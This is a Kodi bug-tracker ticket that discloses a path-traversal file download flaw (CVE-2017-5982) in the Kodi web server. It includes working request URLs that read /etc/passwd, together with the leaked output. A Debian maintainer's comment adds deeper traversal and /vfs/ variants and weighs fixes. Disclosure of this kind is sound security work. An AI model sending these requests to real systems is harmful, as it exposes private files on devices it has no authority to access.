#17314 new Bugs

Kodi 17.1 - Unrestricted file download

Reported by: 0xEF Owned by: Montellese
Priority: 4 - Normal
Component: Web Server / Web Interface / Web API / JSON-RPC Version: 17.1 "Krypton" RC1
Severity: Normal Keywords: Security Bug
Cc: Blocked By:
Blocking: Platform: All

Description (last modified by 0xEF)

The web application loads a thumbnail of an image, video or plugin when selecting a category in the left menu with the following request:

http://192.168.1.25:8080/image/image%3A%2F%2F%252fhome%252fosmc%252f.kodi%252faddons%252fplugin.video.vice%252ficon.png%2F

Insufficient validation on user input is performed on this URL resulting in an unrestricted file download vulnerability. This enables attackers to retrieve arbitrary files from the filesystem by changing the location after the '/image/image%3A%2F%2F’ part.

Example request:

http://192.168.1.25:8080/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd

Response:

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:103:systemd Time Synchronization,:/run/systemd:/bin/false systemd-network:x:101:104:systemd Network Management,:/run/systemd/netif:/bin/false systemd-resolve:x:102:105:systemd Resolver,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:106:systemd Bus Proxy,:/run/systemd:/bin/false messagebus:x:104:107::/var/run/dbus:/bin/false avahi:x:105:108:Avahi mDNS daemon,:/var/run/avahi-daemon:/bin/false ntp:x:106:110::/home/ntp:/bin/false statd:x:107:65534::/var/lib/nfs:/bin/false sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin osmc:x:1000:1000::/home/osmc:/bin/bash

Change History (3)

comment:1 Changed at 2017-02-12T18:23:08Z by 0xEF

  • Description modified (diff)

comment:2 Changed at 2017-02-15T13:08:26Z by rbalint

This bug is also known as CVE-2017-5982.

http://seclists.org/fulldisclosure/2017/Feb/27

comment:3 Changed at 2017-04-26T20:30:28+01:00 by rbalint

Extra info from Debian BTS, https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=855225 :

2017-04-26 19:05 GMT+02:00 Antoine Beaupre <[email protected]…>:

affects 85225 xbmc package xbmc found 85225 2:11.0~git20120510.82388d5-1 thanks

I can confirm this affects both jessie-backports and wheezy. I've been able to access random files on my Kodi install using:

http://localhost:8080/image/image%3A%2F%2F%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%252fpasswd

Just add more %2e%2e%252f in there if that's not deep enough for you. :)

In wheezy, it's even worse - there's a /vfs/ layer that gives you plain access to any given path, as bam discovered. But you don't even need any "special://" protocol, this just works:

http://localhost:8080/vfs/etc/passwd

Given that XBMC 11 (wheezy) and 16 (jessie-backports) are vulnerable, I would be very surprised if XBMC 13 had any reasonable protections in place.

As I explained in this post on debian-lts, I'm really unsure how to fix this issue:

https://lists.debian.org/[email protected]

Should we consider this part of the design that there's basically an open file manager in the Kodi web browser? That may sound ludicrous, but that's the way this thing is built right now. There's *some* password protection as well, although the password is empty by default and is therefore disabled. A possible workaround would be to force authentication, even if there are no passwords set. This would require commenting out this line:

m_needcredentials = !password.IsEmpty();

in CWebServer::SetCredentials (WebServer.cpp). That way attackers would be presented with an authentication dialog at least. There's a default username and password, but at this point we may somehow shift the blame to the user...

The alternative here is to start enforcing path restrictions on the requested files in the webserver. This is a difficult operation because, right now, files can be specified with arbitrary paths, including relative paths with ../ or absolute paths, and there aren't clear boundaries to where Kodi "can look": Kodi is designed to take over a media station and serve contents from all sorts of sources...

So if we change the webserver, we also need to change the callers, and that could prove more difficult...

A.

Note: See TracTickets for help on using tickets.